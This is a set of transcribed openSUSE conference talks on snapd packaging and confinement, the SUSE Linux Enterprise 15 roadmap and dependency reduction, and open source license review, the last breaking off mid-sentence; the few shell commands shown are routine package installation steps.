but it's more than that. Traditional permissions just say: you can do this, period. We thought that's nice, but we can do better. So every interface has two parts: there's a plug part and there's a slot. The slot provides something, and the plug can consume it — and it can only consume it when you plug them together, when you connect them. The connection establishes the actual permissions, both for the consuming party and for the producing party. So maybe there's a snap — say bluez — that provides Bluetooth services, and only when there's a connection between bluez and some snap can bluez actually talk to that snap. bluez is not a privileged snap; no, everything is confined equally. So snaps can provide services to the system, to other snaps. You can create useful runtimes for other people, you can create services for other people, and it's all confined and managed by snapd. And just as a quick comparison to Android-style ACLs — can you do this, can you do that — that's terrible, because every time you look at it — take your phone, if it's Android, install an application — it asks for an endless list of things. What it just told you is technobabble: you can be a technical user, but unless you're a hard-core Android developer you don't really know what that means. But you just have a yes or no question. Do you want it or not? Do you want it or not?
And that's a terrible question to ask. People want it. Why do you ask? You just ask to install it. You always want this. But if you say yes, you can get really nasty things can happen. And that's not possible in snaps. So interfaces are not privileged. Like, hey, it's a reasonable thing for an application to want to talk to the network, just like, I want to, you know, I'm an RSS feed that want to download some feeds. Network is just an interface that's not privileged. Everyone can get it. Maybe there's a super powerful interface that's almost pick out of the confinements to run like a Docker's nice example. It runs all kinds of stuff. Docker interface is only given to the snap that we allow to have this interface. So Docker guys make dockers. They get the interface. But no one else can say I want to be Docker unless we have a conversation with them. Unless they make a valid claim that they can be Docker. On a local system, on a developer system, they can still kind of shorn it in. But they won't be able to socially engineer anyone into claiming they are Docker or they are something else that has superpowers and break out of the sandbox. This is a really important property. Because, you know, we're in a, live in a world where we make a barrier and the nasty guy is going to figure out how to not break the barrier but walk around it. So one thing that I really like is that snaps can offer service to the system. So it's not like you have the system which is special because it's not confined. And there are the snaps which are like little things, but they can't be super powerful. We built a system, entire distribution out of just snaps. Everything is a snap in that world including regular system services. And they're equally confined and they can have slots. So you can have a snap that provides services. You can come up with a great idea and you can make a snap out of that and that snap can interact with the rest of the system. It's just a graph of connections between snaps. And we have quite a few interfaces today. We have 91. That's a lot. There's like lots of things there. I can't even fit the whole, I tried to fit the whole list here but it was just unreadable. But, you know, all kinds of applications from desktop applications to embedded to cloud, it's already there. And it's super trivial to add a new interface. And because of how we develop SnapD. If you provide an interface, we merge it, it's available to you today. Today. In the same day, you can on your system say I want to track the core snap in which SnapD lives from the edge channel which I'm going to talk to in a second. And you're just going to get the nightly build right now. And you can start using the application with that new interface right now. But before there's an interface available to you, there's something we call the dev mode. It's just for developers. It's really, really scary to install things in dev mode. And it essentially switches the confinement into nonenforcing mode. So you're going to say, you know, you can't do this, but in DevMind I'm allowing it. We also built some tools that look at these logs and say, you know, you're doing these things. It looks like you want this interface or that interface or these two. And it really helps developers. And also, when it just says, you know, but I have no idea what this thing you're trying to do is, let's just really figure out what you want to do quickly and craft an interface for you so you can just keep on going. So let's talk about the store. The store is special. 
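Before the store discussion continues: in day-to-day use, the interface and dev-mode handling described above comes down to a few snap commands, roughly like this (the snap name and the camera interface are only examples):

    # see which plugs and slots exist and how they are connected
    snap interfaces
    # connect a plug by hand; snapd picks the matching system slot
    sudo snap connect some-app:camera
    # install a locally built snap with confinement non-enforcing, developers only
    sudo snap install --devmode ./some-app_0.1_amd64.snap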
The store is a service offering from Canonical. It's not free software, but it's a hosted service that is free to use for everyone — you can just put your snaps there and get started right now. We can also give you a commercial store on demand: if you're a device maker, you have a drone and you want to make some apps that run on the drone, but you want to control who can actually put snaps in your store, you can just get a dedicated store from us. And actually the store, apart from being complex and large to scale, is just a simple HTTP endpoint. There are a couple of things like "find a snap", "get a snap" — there's not much there. And it's not a repository. Many people think: I want to have a second store; I don't mind you guys having your store, I would like to have my store. But it's not a repository, it's slightly different. There are choices we've made so that some of the complexity and logic moves away from the client side and onto the server side. For instance, say there are two stores and the same snap is in both — what do you do? We don't want to solve that problem on the client. The store can figure out what to do: maybe it's going to mask one and show the other, maybe it's not going to show either, but it's a store-side decision, and the client side doesn't have to care about it. It's way easier to reason about the correctness of the store that way. And the store handles a lot of things that typical repositories don't handle. It handles uploads, including delta uploads. When you are developing a game — there was a nice example from the AppImage developer — it's a big game, and it's great that you can have delta downloads, but jeez, uploading those gigabytes every time you want to build, that hurts. So we have deltas both ways; that's really fantastic. We have the whole developer workflow — name registration, payments and whatnot, reviews, everything. Also, if you have a snap that wants to use a privileged interface, there's a whole process that lets you use it and lets your snap have that interface, so it's not going to be blocked next time. But one thing I really like about this store, and I think it really changes how people are going to approach developing software, is tracks and channels. It's a really simple concept, as basic as it gets. There is a MySQL snap, but there's just one "mysql" name, and there are many major versions of MySQL people may want to use. Instead of figuring out how to encode that in the name so people can guess what they want, we just let the developers choose. Maybe I can show you a demo later, but there are many, many versions of MySQL available, and you can just choose the one you want. And not only that: for every one of these versions there are four channels, and every one of these channels says what kind of thing you can expect. Those are hard-coded, so across the whole snap ecosystem it looks the same way. There is stable — it means the snap is confined, and you should expect stable performance, correctness and stability. There's candidate — almost stable, but not quite. There's beta, which speaks for itself. And there's edge, which is something for CI/CD setups — just take it straight from master. And you can choose, on a per-snap basis, what you want. You don't have to be Tumbleweed all the way.
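A sketch of what that per-snap channel choice looks like on the command line (which tracks actually exist for a given snap is up to its publisher, so the 5.7 track below is only an example):

    # follow whatever the publisher marks as stable
    sudo snap install mysql
    # or pin one snap to a specific track at a given risk level
    sudo snap install mysql --channel=5.7/stable
    # live dangerously for a single snap only, e.g. track core from edge
    sudo snap refresh core --channel=edge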
So you can be on a stable LTS version of your enterprise distro, and then pick the one thing you care about to be more leading-edge — or just more recent; it doesn't have to be leading-edge, it could just be more recent. And this is a per-snap decision. All the other things are per-snap too: rolling back because an update failed is per-snap. You don't have to treat it all as one big bag. This next bit is maybe not that interesting — actually I should have gotten rid of this slide — but the store gives you revisions. Revisions are something we talk about a lot in snapd; a revision is not a number that is a version, it's just an identifier of a given upload. Whenever you upload something to the store — maybe it's a GitHub build, or something you did locally — it just gets a number. But it's not a version that means something. It's your task and responsibility to put that number into a channel: say, in the stable channel I want number nine, and in another channel, 110. So you can have whatever tracks you like, but there are predefined risk levels so people understand what they mean — especially the stable channel, which is confined. So let's quickly talk about the snapd service. snapd is quite large — I think it's 83 contributors, almost 20,000 commits; there's quite a lot of history there. It's mostly written in Go, because Go is such a good language for this type of application, right? — a complex user-space application. It also has some C parts to make the magic happen in the places that are closer to the OS. And snapd — I can't stress this enough, and there's not enough time to actually explain all of it, I'm not even going to try — has so much fantastic resiliency to errors and so many smarts in it. It's not like dpkg; no, it's far, far more advanced in what it can do to keep your system stable, operational and up to date. So snapd is a service, but there are command-line tools and other clients that talk to it — the GNOME Software Center, for example, talks to snapd, so when you install a snap from the GNOME Software Center it goes this way. snapd essentially handles installation, removal and keeping everything up to date. And it also manages security. All of the interfaces that I've mentioned — it's not like someone can come up with a new security interface that says "I can do anything" just because it's easy. Interfaces are trusted, so they are part of snapd itself; snapd handles the security part. And it's easy to audit, easy to review whatever snapd can request from the system — it's all in the code, it's all versioned. So, openSUSE and snapd: we had a long, bumpy ride. I think we started this last year — I can't remember exactly, I think it was May. And Go packaging — Go is such a nice language, but Go packaging is completely different in every distribution you look at, and very annoying to work with. At that time we just couldn't get it right, so it lay dormant in a broken state for some time. But we've fixed that since. We're not all the way there yet, but we have a working package; we just want to go all the way, to get it into Factory and beyond. And the repository — I should have mentioned this — is the OBS project called system:snappy, so you can get it there. So we have a working package; it works for Leap and for Tumbleweed, and we update it every time there's a release. We vendor the Go stack. And this is a bit of a cry for help: can we vendor that? Do we need to put every separate Go library into a separate package and hope for the best? I don't know.
I would love to talk to someone who is an expert in Go packaging at SUSE. One thing we like about vendoring the Go stack: Go packages are really just source packages, even the "binary" ones, so splitting them all out is kind of meaningless work. And because the exact same vendored versions are used across all the distributions, the QA effort multiplies — we just get more confident that what we tested extensively actually works, and it really does save us a lot of time. But if we have to do it the other way, we'll do it. One thing we really do very well lately, I think, is that we have a very heavy CI system that tests everything we do. So in daily development, if I make a patch today and want to merge it, it's going to be tested on SUSE — and not only on SUSE, but on almost everything. We test many different architectures, distributions and releases of these distributions. I think we have slightly less than 200 VMs, 24/7, each booting up a different system, just testing, compiling, running all the integration tests — and we have lots of integration tests. Essentially, if the tests pass, it means it works; there are very few gaps left, and every time we discover one we try to understand why it happened and fix it. We have very high confidence, and that means we can move at a very high speed. That's why we release snapd almost every two weeks — sometimes more, sometimes less, depending on holidays and such — but we are very aggressive: snapd moves at a very fast pace while staying stable. We also do interesting things with channels: I can't publish snapd to the stable channel, I can only publish it to edge — that's actually done automatically. Our release manager can take snapd and put it into beta, and from there on the QA teams and the project manager can take it all the way. So there's some lag: something that lands in master today gets released to the public in maybe two to four weeks, but anyone can start consuming it as soon as they want by tracking a different channel. So we still have a couple of things we want to do. We want to test Tumbleweed — we just test Leap now; I think that's going to be very easy. We want to get into Factory, and from there on we just want to be a proper SUSE package. But there's one more thing — I'm running out of time. We really would like to have a conversation about AppArmor. You guys pioneered AppArmor. We took it a little bit further in some areas: we've extended the kernel features so AppArmor can control and mediate more of the things that user space does, and that makes our security that much tighter. AppArmor today in SUSE does not have all the capabilities that we have in Ubuntu, and there are a few more patches left — we're upstreaming them. But if you guys would consider taking some of those patches — some are just bug fixes — we would really love to have that conversation. And helping out can be as simple as this: try to use snapd on your system. Try to snap something you make yourself, even tiny packages — it's a new thing, give it a try. You can snap something you love because you use it, or maybe the upstream folks have already snapped it — just look for that. Tell us about it, tell us how it feels. Maybe something's missing, maybe there's some integration that just doesn't feel right for SUSE. We really want to know these things. And lastly, you can stay in touch. We have a couple of places you can go to meet us. We are on IRC, on Freenode, in #snappy.
We're also on Rocket.Chat, which is like a more modern version of IRC where you don't have to be connected all the time. And we have a fantastic — I can't stress this enough — fantastic forum. It's just full of everything. And all of these things are actually running as snaps, which is funny. And the last thing is that you can come and visit: we have a sprint next month, there are details in that link, and I'm going to publish the presentation. I think we ran out of time, but if you want to talk to me about anything snappy, just grab me by the t-shirt and talk to me. Thank you.
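As a concrete follow-up to the "give it a try" invitation above, getting started on openSUSE at the time looked roughly like this. The repository URL follows the usual OBS download pattern for the system:snappy project mentioned earlier, but the exact directory and unit names are assumptions from memory, so verify them against the project page before using them:

    # add the snapd packages from the system:snappy OBS project (path may differ per release)
    sudo zypper addrepo \
      https://download.opensuse.org/repositories/system:/snappy/openSUSE_Leap_42.3/ snappy
    sudo zypper refresh
    sudo zypper install snapd
    # start the daemon and install a first snap
    sudo systemctl enable --now snapd.service
    sudo snap install hello-world
    hello-world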
Snaps are a new packaging format that allows unmodified binaries to run across a wide variety of distributions. Snapd is the software that manages snaps on a running system. Learn about the basics of snaps, snapd and what is needed to port snapd to openSUSE.
10.5446/54449 (DOI)
So, hello, my name is Stefan Behlert. I'm one of those guys Ludwig referred to as SLE management — I'm one of the SLE release managers. And I will bring you a little bit of input and news about the upcoming SUSE Linux Enterprise 15 code stream. And please bear with me: it's a glance into the future, so not everything is set in stone, not everything is final. And there are parts, unfortunately, which I cannot talk about yet, either because they are still so heavily discussed that it would be embarrassing to talk about them here, or because they are still under NDA. So in the next 20 to 30 minutes you will get some general information, we will talk a little bit about what's coming, and then I want to talk a little bit about the challenges on the way that we see there and how this can, will, or may affect you. So bear with me. One or two marketing slides: you can see that with SUSE Linux Enterprise Server we have quite a different life cycle than you are accustomed to from openSUSE. It's much longer — we are talking about 10 plus 3 years — so every decision we currently make for 15 will affect us for the next 13 years. What you can also see there is what we started with code 12: a yearly release cycle of service packs. That means every year you see a service pack. We had SP2 last year, you are currently waiting for SP3, also on code 12, coming this year, and next year you will have 15 as well as 12 Service Pack 4. Talking a little bit about what this means for the products we currently have running on the enterprise side: you see we have SLE 11, which is still under support, where you still get updates; we have SLE 12, where we are currently producing — the first red bubble on the slide — SP3, with SP4 coming after that; and the bottom row, 15, is coming. So we will soon have three major code bases running in parallel, being supported, for a short time. Let me start with one thing: we plan to have the first customer ship of 15 in the second quarter of 2018. You may say that's a little bit far out. It's not — in fact it's 12 months or less, so we are currently working under high pressure to get all the open things fixed and adapted. There's one big change compared to code 12: we will deliver the traditional server operating system — that means a server that has everything — and in parallel we will deliver something we call the SUSE Container as a Service Platform, which is in fact there to host containers and other stuff. On the schedule side, you see we have the code drop deadline in July. In case you wonder what that means: that's for our partners, our software partners, to deliver their parts, their code, their hardware enablement patches, whatever they want us to have inside code 15. That means we are working closely with them right now to get everything into shape by then. We then have until September to get everything together for our documentation department so they can update, write and start documenting how code 15 will work. And shortly after that — most likely not all of the documentation will be finished by then, but hopefully at least some of it — we will release Beta 1, which will be the first public beta accessible to everybody. In case you are wondering: no, that's of course not the first milestone we produce.
We have several alphas in between and before, but those are internal only, so we get time to fix everything that is broken, that is not working to our satisfaction, or that is hindering us. One beta, followed by relatively short release candidate milestones, and then in April you get the gold master, followed soon after by the first customer ship. The gold master candidate, in case you wonder, is for us internally the point when we want to have everything ready so it can be shipped, and the first customer ship is when we have everything ready so customers and everybody else can really use it — every mirror has been filled, the download servers are ready, and so on. So now to the part that most likely interests you the most: what's coming on the scope side? Yes, it's a new major code stream. Ludwig said it earlier on this stage: everything is getting updated. That means we are really looking at every package for an update, which is quite a lot. You have seen, I think in one of Richard's slides, that Tumbleweed has 10,000 packages; SLE on code 12 currently has between 3,000 and 4,000 — it varies a little depending on the platform — and with code 15 I expect it to be in the same range. So that's quite a huge number of packages we have to look at, and everything should work together, of course. On the platform side, no big changes: you see x86_64, s390x, POWER little-endian (ppc64le) as well as ARM — nothing surprising, the usual; what you have seen on code 12 will also exist on 15. We will also release, at the same time, JeOS images as well as CaaSP. I'm not sure if you have a talk here specifically about CaaSP, but I'm pretty sure it will be mentioned in other talks, so I will not go into too much detail there. One big change we want to make is to enhance the module concept we started with code 12. That means we want to keep the installation media relatively small, produce more of it as small, independent or mostly independent building bricks — let's call them that — and build our products out of these. I looked around a lot for a picture that would show this in a good way, and I admit every picture and every diagram I saw had its flaws. This one comes close to how it will look: we have the common code base that we use for all the products, one repository out of which we build everything for all the products so they work together. Out of that we build something marked here as "lean OS" — in fact it's our code name for the installation media — and out of that we build various building bricks, and I call them that on purpose, from which we then create the various products, and of course also the modules that sit on top of these products. That has some challenges, and we will come to those later. Packages and versions: well, I told you already, we will update everything. A few numbers: on the kernel side we will use 4.12, on the glibc side 2.26, and on the GCC side 7.2. You may notice that none of these three is yet available in a final, stable version. We know that. For some we expect them to be there by Beta 1; some of these three may not be final when we have Beta 1 but will be in the last phase of their release-candidate cycle. So we plan to go with these versions because we think it makes the most sense for everybody — we will be there a little bit ahead of what is stable.
You see there are three kinds of blocks there: on the lower end GNOME 3.26, and we will also have Wayland support — so you see we are also planning some changes, newer versions and updates here. On the right side is the most interesting part, because we also plan to replace some defaults we had. For example, we want to switch from NTP to chrony, which has some challenges; we plan to switch from SuSEfirewall2 to firewalld; and we are currently looking at the 389 Directory Server. So there are some big changes coming, and we hope they will work out nicely. But those big changes also produce quite some challenges that we've stumbled over. As you have heard, we are currently working out of Factory, and SLE 15 is based on openSUSE Factory. Ludwig said we will fork off at one point in time, and that will be in July — roughly speaking; I am not giving an exact date here because it will depend a little on what we have then, how stable we are, and when we go with stuff that is incompatible and, for example, stop at certain versions of packages. But roughly said, it will most likely be mid-July. Until then we use everything the same way as it is in openSUSE Factory: the same packages, the same code. We have a few adaptations when it comes to the branding packages, and we run everything we have there through openQA tests independently of what is running on openSUSE itself, simply because we have some tests there and we want to get everything running smoothly. Of course, bugs we find also go back to openSUSE Factory. We encourage people, as you have heard from Ludwig, to submit there. We also ask you as openSUSE contributors: if you have bug fixes, submit them early enough so we can see and test them and check whether there are side effects on platforms that maybe are not tested as intensively in openSUSE as they are on SLE. And of course, if you are a package maintainer or devel project maintainer, help us by accepting stuff early, because the sooner we get everything in, the better, and the earlier we can test it on all the platforms. One thing that is currently causing me a bit of a headache is dependencies. I am pretty sure you all have a desktop machine with something relatively huge installed on top of it, and if you install a new package it's mostly just that package and that's it. But if you use a rather small installation image or installed system and then try to install stuff, you will find dependencies that are bad, that are not good. Why do we want to get rid of these dependencies, or smooth them, or make them easier? A simple reason: we have people who want a small installed system. We also have people who want to run containers and virtual images that are small, and the more packages you add to a system when you do a "zypper in", the more unstable and the more insecure it gets, and the more you have to look out for side effects. So we want to keep that relatively small, and therefore we did a few tests on such a rather small installation — and please don't tell me that 650 MB is not small. Yes, I know there are people who got it down to 200 MB; I know of one person who claims to have a running system with 50 MB. Yes, but we want it to be upgradable, we want to be able to install packages, and a few other things. So this was the compromise we had there. I will show you a few examples on the next few slides. One caveat in advance.
Note that all the numbers you see may not be valid anymore because dependencies change over the time and if you follow OpenSUSE factory closely you can see this. Note that the package maintainers are in most cases not to blame because we have dependencies that are there since ages. The oldest one that I found was from 2003. We have dependencies that are there because upstream thought it would be nice to have it. And some of these dependencies made sense at the time they were added. Some made even in our sense. But of course not necessarily if you want to be on a small system. For all these three examples, and I took them on purpose, that will come a big thank you to the package maintainers who helped to get the dependency solved. I'm not an expert in most of those. So a big thanks for the work they did here. First, you remember I said we want to exchange the SUSE firewall 2 with the firewall D. Looking at SUSE firewall, if you install it on the test machine, nine packages, 41 megabyte. That's not good I thought at the first moment. Then we tried to install the firewall D. Same system, of course. 83 new packages. And 106 megabyte. What? I thought 40 was bad, 106, not good. I'm pretty sure you can't read all the packages there. You should not. But looking at the package list, we noticed three things that fell out. One was firewall D wanted to install Mesa on a system that had no X. Ah, strange. Okay. Python, G object. Yeah. It's clear if you have Python, you get a lot of packages. But maybe there are some things which you can do on the dependency list. D bus 1, X11, I think meanwhile it's called Python D bus, Python 2 or Python 3. So you see this is two, three weeks old. All those pull in several dozen packages. And in the end, you have the firewall D and you end up with 106 megabyte. And the bad thing is the firewall D maintainer can't do anything because it's somewhere in the chain that follows up. Somewhere on Python, G object, on the D bus X11 package, you simply pull in dozens of other stuff. And that's also where Mesa comes into the play. So the Python maintainers and the firewall D maintainers looked at it, changed a little bit on the dependencies, fixed one or two, changed the require here and there to use something different. And then we retried the same thing, but this time also without the recommends. And we had 34 packages suddenly, no longer 80, but 34. And more astonishingly, we were down to 22 megabyte, which is less than where we started from with the SUSE firewall 2. So that was good. That's okay. If you install with, and that's a type on the slide, if you install with the minus, minus recommands, you get a little bit more packages, quite a lot of more, but that's okay then because that's exactly what we expect then from the recommends. But if you install without recommends, then you end up with less dependencies there and less space used than we had before. And all of that simply because the D bus one X11 package was not the best choice there to take. There were some other package that was helpful and that reduced the dependency dramatically. Another case, we stumbled over the Java packages tools. If you try to install Java, you sooner or later get this package and it fetches you lower, it fetches you Python. And that is not necessarily bad on the space side. If you look 40 megabytes, but if you consider that you just wanted to install Java and you end up with Lua as well as Python, that's not good. So we looked into the Java packages tools. 
The Lua is there simply because there's one script that changes a path from absolute to relative, or the other way around. And the Python — well, the Python is problematic, because the Python parts are there to help people who use Maven get everything installed and set up correctly. So Tomáš Chvátal looked into that, made some changes and looked a little into the Java dependencies. Some of that is already fixed in Factory at the moment, some fixes are still pending. We are not getting rid of Python, because of Maven, but it will get better and we will reduce the dependency chain a little. You may ask: is it worth it just to reduce it a little? I don't have numbers yet, because the fixes are still pending, but yes, it's worth it, because every package really makes a difference: at some point the dependencies below that package will change again and you suddenly end up with a big bunch of packages once more. And if somebody has a good idea how to get Maven support without Python in javapackages-tools, speak up and help us there, because that would be really good. At the end: all scripts are welcome — just submit to openSUSE Factory and it will automatically get there. The third one: ghostscript-cjk. When I first installed that package on the test system, I was astonished because I suddenly ended up with libQt5 libraries. And I was wondering why I need libQt5 packages if I want to install ghostscript-cjk, which is just some font support for Ghostscript. A little digging showed the reason was simple: there was a Requires on the ft2demos package, and that Requires was introduced in 2003. Looking at why it is needed: ft2demos is really a big collection of FreeType tools, including graphical ones — hence the dependency on libQt5. And it was only needed because in two files, two scripts, ftdump was used, and it was not possible to omit that. So that's the case I meant when I said the dependencies below you will grow bigger and bigger over time. We looked at how to change that, and the solution was to split the ft2demos package into several sub-packages. So now you can simply require ftdump if you need it, and you don't get all the many FreeType applications that require the Qt stuff; you can install it without libQt being pulled in. The split is already in openSUSE Factory; the change for ghostscript-cjk is still pending, but once that is done, it will also reduce the number of packages brought in. And it's a good example of why it's sometimes a little tricky to find the right package to add as a Requires, and why it's sometimes very good to split your package. So if you're a package maintainer and you're considering having everything in one package, think about the dependencies — whether that's really needed, whether it would be useful to have it in several parts. It's obvious when you have plug-ins or similar, but there are also cases where it's not as obvious and it still makes a big difference.
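A hedged sketch of what an ft2demos-style split looks like in a spec file — package and file names are simplified placeholders, not the actual openSUSE packaging:

    Name:           ft2demos
    # ... preamble, %prep, %build as usual ...

    %package -n ftdump
    Summary:        Standalone ftdump tool from the FreeType demos
    %description -n ftdump
    Only the ftdump binary, so that consumers such as ghostscript-cjk
    can require it without dragging in the graphical demo programs.

    %files -n ftdump
    %{_bindir}/ftdump

    # and in the consuming package's spec file:
    # Requires: ftdump        (instead of Requires: ft2demos)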
If you see dependencies that worry you or if you install a package and you suddenly end up with packages where you wonder why is this the case, don't be shy, open a bug report or look into it or even better submit something because that helps us all to get the distribution smaller, to get the stuff that the footprint, let's call it in that way, that we pull into when we update smaller and it helps also with maintaining all that stuff. At the same time, if you create a new sub package, please think about the description. There was a long thread on one of the open Susan mailing lists, so I will not go deeper into that, but opening a bug report or submitting a patch to adapt a description is appreciated. And not everybody knows what is in a sub package, so that is also helpful. And one more thing, advertising a little bit here. With SLEED 12, we started to have public beta. So while with code 11, you had to be one of our partners and be in a partner program to join our beta and were hand selected and had to go through an assessment center and what else, it was not as bad, but nearly to join. We are in SLEED 12, public beta where everybody could join and we plan to have the same thing again for SLEED 15. You have seen beta one will come in September. So you have still time to apply there. We ask for an email address and a few other things as far as I know. Go to the URL that is mentioned there. You can also search on the SUSEB main page for beta program. There is everything you need on information and there is also the way to say I want to join. And then you can get SLEED 15 images relatively soon when every milestone is finished. And published, you have access to it. We are happy about everybody who joins there. We are not promising to fix every bug report there, but we try our best to get everything solved to your satisfaction there. And it's really cool if you join there and get these images early enough so if you are missing something or think something is wrongly configured, you can influence the SUSEB enterprise product and therefore also to a certain degree LEAP because LEAP will also be based on that. So with that, I'm at the end. We have around one minute left, but if there are questions and answers, I'm willing to go beyond that time frame that I have. You got my attention when you said that you were changing the firewall. And what I'm wondering is if I have an application that's dependent on using the CLI or API calls to the old firewall, is that going to break my application? That's a good question. That's why I asked it. And I'm sorry I have no clear answer to you yet. We have a script. We are currently looking into the migration path there, what we can do to make the transition easy. We are not 100% sure if we can cover every case, to be honest. Oh, thank you. But of course, join the public beta and there, I think if you bring it up, if it's not working, then we will look also in these cases. Because I don't want to lie to you, we are not there yet that we can say for sure everything or every situation is supported. I'm pretty sure not seeing what some people do with the firewall and a few other of the old stuff. And in case you ask, I've seen people doing things with a finger server where the finger server was never intended to be used for. So, and we will drop that in case you don't know what a finger server is, don't ask its old stuff from the last century. So yes. 
Well, I appreciated your comment about not wanting to lie to me because it reminded me of an old story about the difference between a car salesman and a computer salesman. A car salesman knows when he's lying. I'll leave you with that. I just sometimes have no clue, but that's all. You wanted to say something? Also related to the question about firewall, is there any schedule change with regard to the network management infrastructure in SLEE 15? Sorry, I didn't get the last part. Is there any plan to change the network management infrastructure in SLEE 15? Because right now, as I see it, there's basically three solutions that basically exist and need to be maintained somehow. You're talking about Wicked Network Manager and the SISTEMD Network D. It's not so easy to answer. We will definitely keep Wicked. That's for sure. We definitely plan to keep the Network Manager at the moment. We are nevertheless looking into getting all these reintegrated more closely and especially on the system, the Network D side. We see on the upstream side development that's very encouraging. There were one or two years ago still the tendency to use that or to have the main purpose for that only on the cloud stuff. Meanwhile, that intentions for it have changed. We are looking into that and planning to integrate all three, but we will definitely have as main systems the Network D as well as the Wicked. Because for one thing, we don't want to change all the conflicts in a migration. The other thing is we currently don't think SISTEMD Network D is where it should be, for example, for a server infrastructure. Does this answer your question? Yes, it's a pain that we have so many things. That's why we want to integrate it. More questions? If not, then I'm one minute late, but my architect is used to that. Thank you very much.
A short introduction to the plans for SLE 15. You will learn about the schedule, scope, and other details of the next major code stream for SUSE Linux Enterprise products.
10.5446/54455 (DOI)
Hi. I'm relieved that not so many people joined this talk, because the topic is quite complex — unfortunately I put the "easy" tag on the presentation and only realized while writing the talk that it's quite a complex problem. About me: I'm Stephan Kulow. I work for SUSE in the Enterprise Core department. I used to be the release manager of openSUSE until the release of Leap, and I'm acting as an openQA tools architect — and not as a lawyer. So most of the stuff I will tell you is actually bullshit, but take it as advice from someone who doesn't know licenses to someone else who doesn't know licenses. And I asked Ciaran to be around for the overly-bullshit parts, which he will then correct, no doubt. The topics of the talk are the whole background of open source licensing, what I describe as licensing hell, then how we actually handle it within openSUSE — the actual process — and I will briefly introduce you to the tool we use, which we named computer-aided vicious licensing, Cavil for short. So why are we actually doing legal reviews? Most of you who do packaging will have heard about license review, mostly with bad connotations. The problem is that open source comes in many, many flavors. There's no single "this is open source", but we as a distribution — or SUSE for its products — need to have the license to distribute the sources, and to compile and patch them, to users. And with this review we're trying to protect the users and the customers from any dangers that would arise from not having correct licenses. One prime example: if someone puts a license on his code saying it must not be used in a commercial offering, then SUSE does not actually have the right to distribute it — and it would also not be open source. So there's no place for that software in Factory, because Factory — that is, Tumbleweed and Leap — is supposed to be open source only. So what is open source? As I already said, there is no single definition of open source; there are actually many definitions of what open source is, and most people have a feeling for it. There is, for a long time now, the FSF propagating free software, which is about more than just the source — it's also about the culture and the politics around free software. We had a great keynote on Friday from the FSFE on what all these politics come down to. And we have the Open Source Initiative, which propagates open source — which is different, and there was quite some controversy about this, from what free software is. So open source is more generic than free software. And openSUSE as a distribution follows the Open Source Initiative's definition of open source for code; for content like wallpapers, icon themes, you name it, there are different rules, and they are listed in the packaging guidelines. They are mainly about knowing where it's coming from, that there are no trademarks in it, and no porn — the packaging guidelines even specify that there are better places to get porn. So the open source definition according to the Open Source Initiative comes down to four basic points. The actual rules are, as always with licenses, much, much longer, but mainly it's about the following: that it is free for everyone — as in, no money; that the source code is available to modify — which also includes that the code is provided as a developer would modify it, not with some pre-processing or post-processing applied to the source; that the license allows derived works — that means you can just take it and do your own stuff with it.
And the source does not discriminate against use cases, people or platforms. The discrimination part is actually the longest part of the open source definition, because there are many ways you can discriminate, and they are all listed in pretty great detail. On the opensource.org web page you also find a list of popular licenses that are used in the wild. They name the Apache license, and I guess this list is alphabetically sorted, which is not only used for Apache itself but for a lot of Java packages, for example. You have the BSD 3-clause and BSD 2-clause licenses, which are also used very often. You have the GPL from the FSF and the LGPL, which is the Lesser or Library version of the GPL. You have the MIT license, which is used for X11, and a lot of Ruby stuff also comes as MIT. And you have the Mozilla Public License, which is not used that much but is very popular, because LibreOffice and Firefox are under this license. So in terms of users, the Mozilla license will still be very relevant. To illustrate the concept of licenses I find the icons used by Creative Commons quite nice. This is actually from Wikipedia, if you look up Creative Commons licenses. At the bottom of the graph you have "all rights reserved", which is the default if you don't put the code under any license. On the left side of the colors are the rights that are added. The first right added with Creative Commons is the right to share the content, or the code in this case, which then creates the licenses they call CC BY-ND, or NC for non-commercial. So for music, for example, you can take a track from an artist and share it as long as you don't sample it or create something that you put your own name on, and as long as there is no cost to the user involved. The next right is to remix, and there you get into the light green area, but it is still not open source. Open source only starts when it gets really dark green, because then you also add the right to use it in commercial products and to modify it; the remix part is already there. And at the top there is public domain, what they call CC0. It is a pretty long license that says there is no license, or rather, there is no problem: you can do whatever you want. There are other licenses that express this, but CC0 is the more polite form. One of the big problems we have as a distribution is that we are not distributing plain source, we are distributing a distribution, which contains big mixes of derived works from open source. You will find the same implementation of an MD5 checksum in many, many packages, and the license the original author picked carries over into each package using it; but the licenses that come with these sources are then mixed within one binary in our distribution, and this mixing of licenses also means mixing of rules, which basically creates a new license with a new set of rules. And not all open source projects are aware that you can't blindly mix open source licenses. Some you can, some you can't, but not everyone knows.
For example, version 2 and version 3 of the GPL are actually not compatible. That was a big problem for KDE, for example, as we had KDE talks before: KDE code used to be GPL version 2 only, and Samba came along with only version 3, and then there was a big problem. I think KDE resolved this by relicensing to version 2 or 3. And very often licenses have explicit permissions to link certain libraries or certain licenses. One example of licensing hell I wanted to show you, although I'm not so sure about my time, is this very LibreOffice I'm doing the presentation in. If you go to the web page, it says it's free software. If you look deeper, it says it is under the Mozilla Public License. But let's see if my monitor cooperates, I guess this one. So this is the "about licensing" dialog, which says it's basically Mozilla, but if you look at the license of LibreOffice, it's actually 189 pages, and what Ciaran, or basically what our legal review process, has to do is review this to verify that there is nothing hidden that actually makes it illegal or impossible to redistribute LibreOffice in openSUSE. I'm still scrolling, by the way. So this is what I call licensing hell, and I bet every one of you checked this before using LibreOffice. But fortunately you don't have to, because you can trust my presentation skills and you can trust our licensing review, so let's skip the rest of this scrolling. One thing that came along some years ago is SPDX, which is a common naming scheme for licenses in open source. They have a big list of licenses, and there is a committee deciding, when a new license comes around, what name it gets and what the official license text for it is. So as an open source project, or as a distribution, or as some vendor, I can express my open source licensing in a way everyone understands, because it is now unambiguous. Before SPDX, take what I call the Perl license, the license that Perl is under: Fedora still calls it "GPL+ or Artistic", but the SPDX form that everyone should use is "Artistic-1.0 OR GPL-1.0+", where the plus means GPL version 1 or later. And this is just a brief example where you can already see that even the BSD license, where some say "okay, I'm BSD", comes in so many flavors that it needs more clarification about what exactly is required from the user or the redistributor. Here are some small statistics I created from the legal license database: most of the files in our packages are GPL, public domain or BSD 3-clause, and you can see the list is quite long, but it's dominated by only a couple of licenses. I have already lost you, I'm sure. So how do we handle this licensing hell? As part of the development process for basically every SUSE and openSUSE project there is something we call a submit request, as you might know, and legal-auto is a small review bot that is part of this reviewing process. It reviews, with the help of an application, the sources and the spec file of the package, and if this combination of licenses is known for this package, it will accept the review; otherwise it will wait for a lawyer to review the combination and approve it, and after that the bot will approve it as well. What the lawyer uses is an external application that the bot talks to, and that is what I will introduce to you in the 